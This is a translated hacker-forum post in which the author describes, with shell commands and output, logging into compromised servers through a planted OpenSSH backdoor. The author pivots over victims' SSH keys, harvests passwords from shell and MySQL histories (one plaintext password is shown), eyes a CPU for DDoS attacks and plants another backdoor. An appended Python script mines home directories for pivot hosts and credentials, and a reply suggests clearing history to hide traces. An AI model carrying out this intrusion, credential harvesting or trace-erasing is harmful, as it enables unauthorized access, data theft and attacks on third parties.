384 Host online, heads up
Posted 2013-1-1 15:06:54

A recent zombie box. I happened to log in and noticed the SSH backdoor had logged something (#364 persistent backdoor: openssh backdoor, http://www.3g-sec.com/thread-1059-1-1.html).

Judging from the IP, he probably set up HOSTS entries.

The account and password were both captured, so connect.
Then I connected without even entering a password:


    root@vps40:/usr/local/lib# ssh root@dghost
    Warning: the RSA host key for 'dghost' differs from the key for the IP address '1XXX61XXXX71.59'
    Offending key for IP in /root/.ssh/known_hosts:22
    Matching host key in /root/.ssh/known_hosts:25
    Are you sure you want to continue connecting (yes/no)? yes
    Last login: Fri Dec 14 00:00:35 2012 from XXXXXXXX
    -bash: __rvm_add_to_path: command not found
    [root@localhost ~]#


Did he set up key authentication? (#369 SSH auto login, http://www.3g-sec.com/thread-1106-1-1.html)

Took a look, and sure enough!


    [root@localhost ~]# exit
    logout
    Connection to dghost closed.
    root@vps40:/usr/local/lib# ls /root/.ssh/
    authorized_keys  config  id_rsa  id_rsa.pub  known_hosts  known_hosts.old
    root@vps40:/usr/local/lib#


His shell history entries involving SSH are as follows:


    root@vps40:~/.ssh# history | grep ssh
       64  ssh-copy-id dghost
       93  cat /etc/init.d/ssh
      133  ssh-copy-id hb
      191  ssh dghost
      192  ssh-keygen -f "/home/muzik/.ssh/known_hosts" -R dghost
      194  ssh dghost
      195  ssh-keygen -f "/root/.ssh/known_hosts" -R dghost
      196  ssh dghost
      197  ssh-keygen
      198  ssh-copy-id dghost
      501  cd .ssh/
      511  ssh 0cf9ahhk@dghost
      512  ssh root@dghost
      522  ssh root@dghost
      523  ls /root/.ssh/
      529  cd .ssh/
      538  history | grep ssh


Found another user, /home/muzik/

Checked its history:


    root@vps40:/home/muzik# cat .bash_history  | more

Found that he uses rsync:


    rsync -avzP root@dghost:/home/backup/db/daily/tb_prod/daily_tb_prod_2012-12-10_1

dghost was already owned; otherwise I could have pushed a trojan over. But this big shot uses Ruby... and there doesn't seem to be a Ruby backdoor. Nothing left to see on the old zombie, so on to the new one.

    root@vps40:/home/muzik# ssh dghost
    ...(redacted)...
    [root@localhost ~]# free -m
                 total       used       free     shared    buffers     cached
    Mem:          7869       7317        552          0        110       4450
    -/+ buffers/cache:       2757       5112
    Swap:         7999        428       7571

8G of RAM.
    [root@localhost ~]# fdisk -l

    Disk /dev/sda: 500.1 GB, 500107862016 bytes
    Disk /dev/mapper/VolGroup-lv_home: 437.5 GB, 437503655936 bytes

1TB hard disk.
    [root@localhost ~]# cat /proc/cpuinfo | grep name
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz
    model name        : Intel(R) Xeon(R) CPU           L5320  @ 1.86GHz

An 8-thread CPU, perfect for DDoSing the 九区 dogs. My favourite.
Looked at the SSH login records; not active:
    [root@localhost .ssh]# cat known_hosts
    localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA352C3vyrcIc2ezHiBaPmxumv/DviF1L3Qayr/sPW95pxiP+dIS6QUul56N3ArKwhFsemB7lBMZacH59JCkV7XRXV5ofeMP4ukJBZ/0HjruEC00rLI93Ly8Wlyf0q0PO6jVNCOMMBSfQWVzem/szbqTdRipHzJEjz+vDFnsp1tBB5747QD3fMbkVp2TTpxff1VTvrhiD5+EU+KDRgFUrvkAmDO/gAthjHAGSvKqZoRD8e6FMZqHKvJ27j+wU3mqb61+f3r2a7zCvHHtRFrCXlN3t3kaNg5O3kjL/wQK1peRBgmPXdOidm9osJq4xnIJFpmh2YWvBNxvALG0P/xim/Cw==

Looked at the MySQL history and found a password:
    [root@localhost ~]# cat .mysql_history
    ---omitted---
    create user 'muzik'@'localhost' identified by 'angela00';
    ---omitted---
    [root@localhost ~]#

Looked at the vim history and found a lot of SH files:
    [root@localhost ~]# cat .viminfo | grep conf
    :e config/cs.properties
    '5  216  0  /etc/automysqlbackup/myserver.conf
    '9  63  0  /etc/automysqlbackup/automysqlbackup.conf
    -'  216  0  /etc/automysqlbackup/myserver.conf
    -'  208  0  /etc/automysqlbackup/myserver.conf
    -'  73  0  /etc/automysqlbackup/myserver.conf
    -'  10  24  /usr/src/snda-cloud-storage-python-tool-0.1.1/config/cs.properties
    -'  63  0  /etc/automysqlbackup/automysqlbackup.conf
    -'  23  0  /etc/automysqlbackup/automysqlbackup.conf
    -'  1  0  /etc/automysqlbackup/myserver.conf
    -'  1  0  /etc/automysqlbackup/automysqlbackup.conf
    -'  29  0  /etc/nginx/nginx.conf
    -'  34  1  /etc/nginx/nginx.conf
    -'  30  8  /etc/nginx/nginx.conf
    -'  2  0  /etc/nginx/nginx.conf
    -'  9  11  /etc/nginx/sites-enabled/default.conf
    -'  10  8  /etc/nginx/sites-enabled/default.conf
    -'  1  0  /etc/nginx/sites-enabled/default.conf
    -'  1  0  /etc/nginx/nginx.conf
    -'  42  6  /etc/sysctl.conf
    -'  1  0  /etc/sysctl.conf
    -'  30  0  /etc/redis.conf
    -'  53  0  /etc/redis.conf
    -'  137  0  /etc/redis.conf
    -'  1  0  /etc/redis.conf
    > /etc/automysqlbackup/myserver.conf
    > /usr/src/snda-cloud-storage-python-tool-0.1.1/config/cs.properties
    > /etc/automysqlbackup/automysqlbackup.conf
    > /etc/nginx/nginx.conf
    > /etc/nginx/sites-enabled/default.conf
    > /etc/sysctl.conf
    > /etc/redis.conf
    [root@localhost ~]#

Found the MySQL password in those configs; not posting it. Also found that it runs nginx:
    [root@localhost /]# ps -ef | grep nginx
    muzik     2133  8346  0 Dec13 ?        00:00:05 nginx: worker process
    muzik     2134  8346  0 Dec13 ?        00:00:09 nginx: worker process

Found the configs binding his domains:
    [root@localhost sites-enabled]# ls
    default.conf  php.qjks  rails.jxjw  rails.ndrc  rails.tb

Checked the other host from the SSH history:
    root@vps40:/usr/local/lib# ssh hb
    ssh: connect to host hb port 22: Connection refused

Can't connect.
Ping gets a reply:
    root@vps40:/usr/local/lib# ping hb
    PING hb (118.244.X.192) 56(84) bytes of data.
    64 bytes from hb (118.244.X.192): icmp_req=1 ttl=108 time=210 ms
    64 bytes from hb (118.244.X.192): icmp_req=2 ttl=108 time=211 ms

The nmap scan came up empty, so I stopped looking. Logged in to the 7-CPU box and planted a backdoor; keep waiting. Host online, heads up.



Play a thousand tunes and you know music; examine a thousand swords and you know weapons.
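The triage the post does by hand (grep ssh out of the shell history, read .viminfo and .mysql_history, compare known_hosts entries) as an added example that is not part of the original post or any tool the poster used. It assumes the home-directory files have been read into strings; every sample file in the block is constructed, with made-up hosts, users, keys and documentation-range IPs, and the function names (ssh_targets, edited_files, mysql_credentials, host_key_conflicts, report) are the example's own. The known_hosts check goes one step beyond the post: it reproduces the condition behind the "host key for 'dghost' differs from the key for the IP address" warning the poster clicked through, using /etc/hosts to pair names with IPs.

```python
"""Triage a compromised account's home directory for lateral-movement leads.
Added example, not code from the post.  All sample files below are constructed
(made-up hosts, users, keys, documentation-range IPs) to mirror the post."""
import re

BASH_HISTORY = """\
ssh-copy-id dghost
cat /etc/init.d/ssh
ssh-copy-id hb
ssh-keygen -f "/root/.ssh/known_hosts" -R dghost
ssh 0cf9ahhk@dghost
ssh root@dghost
rsync -avzP root@dghost:/home/backup/db/daily/tb_prod/daily_tb_prod_2012-12-10_1 .
scp dump.sql deploy@10.0.0.5:/tmp/
"""
VIMINFO = """\
:e config/cs.properties
'5  216  0  /etc/automysqlbackup/myserver.conf
-'  29  0  /etc/nginx/nginx.conf
> /etc/redis.conf
> /home/muzik/app/config/database.yml
"""
MYSQL_HISTORY = """\
show databases;
create user 'muzik'@'localhost' identified by 'hunter2';
grant all on tb_prod.* to 'app'@'10.0.0.%' identified by 'S3cret!';
"""
ETC_HOSTS = "127.0.0.1 localhost\n203.0.113.71 dghost\n198.51.100.192 hb\n"
KNOWN_HOSTS = """\
dghost ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkeyStoredUnderTheName
203.0.113.71 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdifferentKeyUnderTheIp
hb,198.51.100.192 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChbKey
"""
LOGIN_CMDS, COPY_CMDS = {"ssh", "ssh-copy-id", "sftp"}, {"scp", "rsync"}
OPTS_WITH_ARG = {"-p", "-P", "-i", "-l", "-o", "-e", "-F", "-J"}  # options that take a value
CRED_RE = re.compile(r"""['"`]?([\w.-]+)['"`]?@['"`]?([\w.%-]+)['"`]?"""
                     r""".*?identified\s+by\s+['"]([^'"]+)['"]""", re.IGNORECASE)


def ssh_targets(history):
    """Sorted (command, user, host) for every remote login or copy.  'ssh-keygen -R
    host' is listed too: scrubbing the stored key right before reconnecting is how
    an operator silences the changed-host-key warning."""
    found = set()
    for line in history.splitlines():
        toks = line.split()
        cmd = toks[0] if toks else ""
        if cmd in LOGIN_CMDS:
            args = iter(toks[1:])
            for tok in args:
                if tok in OPTS_WITH_ARG:
                    next(args, None)            # skip the option's value
                elif not tok.startswith("-"):   # first bare word is [user@]host
                    user, _, host = tok.rpartition("@")
                    found.add((cmd, user, host))
                    break
        elif cmd in COPY_CMDS:                  # [user@]host:path operands, not URLs
            for m in (re.match(r"(?:([^@\s]+)@)?([A-Za-z0-9.-]+):", t)
                      for t in toks[1:] if "://" not in t):
                if m:
                    found.add((cmd, m.group(1) or "", m.group(2)))
        elif cmd == "ssh-keygen" and "-R" in toks[:-1]:
            found.add(("ssh-keygen -R", "", toks[toks.index("-R") + 1]))
    return sorted(found)


def edited_files(viminfo):
    """Absolute paths from .viminfo file-mark ('x), jumplist (-') and file-mark
    history (>) lines: the files the operator opened in vim."""
    hits = (re.search(r"(/\S+)$", line) for line in viminfo.splitlines()
            if line[:1] in ("'", "-", ">"))
    return sorted({m.group(1) for m in hits if m})


def mysql_credentials(history):
    """(user, host, password) from CREATE USER / GRANT ... IDENTIFIED BY lines;
    the mysql client writes these statements to .mysql_history verbatim."""
    return [m.groups() for m in map(CRED_RE.search, history.splitlines()) if m]


def host_key_conflicts(known_hosts, etc_hosts):
    """Names whose known_hosts key differs from the key stored under the IP that
    /etc/hosts maps them to: the condition behind ssh's 'host key for X differs
    from the key for the IP address' warning (rebuilt host, or a MITM).
    Only plain (unhashed) known_hosts entries can be compared."""
    name_to_ip = {n: f[0] for f in (l.split("#")[0].split() for l in etc_hosts.splitlines())
                  for n in f[1:]}
    keys = {}
    for f in (l.split() for l in known_hosts.splitlines()):
        if len(f) >= 3 and f[0][0] not in "#|@":    # skip comments, hashed, @markers
            for name in f[0].split(","):
                keys[name] = (f[1], f[2])           # (key type, base64 key)
    return sorted((n, ip) for n, ip in name_to_ip.items()
                  if n in keys and ip in keys and keys[n] != keys[ip])


def report():
    """Everything above for one home directory, passwords reduced to a length
    so the report can be shared without leaking the credential again."""
    return {"ssh_targets": ssh_targets(BASH_HISTORY),
            "pivot_hosts": sorted({h for _, _, h in ssh_targets(BASH_HISTORY)}),
            "edited_files": edited_files(VIMINFO),
            "mysql_users": [(u, h, f"<{len(p)} chars>")
                            for u, h, p in mysql_credentials(MYSQL_HISTORY)],
            "host_key_conflicts": host_key_conflicts(KNOWN_HOSTS, ETC_HOSTS)}
```

On a real box, replace the constants with the contents of `~/.bash_history`, `~/.viminfo`, `~/.mysql_history`, `~/.ssh/known_hosts` and `/etc/hosts` read from a copy of the home directory. A host that appears under both `ssh-copy-id` and a later `ssh` with no password prompt is the same trust relationship the post exploited: the compromised account's key sits in that host's authorized_keys, so every pivot host is a second incident, not just a lead. Hashed known_hosts entries (`HashKnownHosts yes`) cannot be paired with names and are skipped.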
Posted 2015-4-8 13:38:26

Posted 2015-7-1 13:20:55
When running commands on Linux, why not use history -c to clear the history? I'm speechless.
